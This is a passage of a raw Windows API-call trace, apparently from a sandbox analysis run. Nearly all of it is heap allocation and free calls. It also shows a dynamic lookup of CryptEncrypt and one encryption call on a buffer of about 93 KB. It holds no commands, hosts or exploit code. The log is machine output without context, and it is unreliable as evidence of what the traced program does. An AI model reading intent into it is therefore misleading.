0x24b6a30 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.100] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.100] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.101] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.101] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0206.101] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34df940 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0206.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0206.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9de0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0206.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.107] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0206.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0206.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0206.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0206.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0206.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0206.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0206.107] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x16b6c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x16b70) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0206.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0206.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0206.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.118] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.118] CharLowerBuffW (in: lpsz="byte[93040]", cchLength=0xb | out: lpsz="byte[93040]") returned 0xb [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 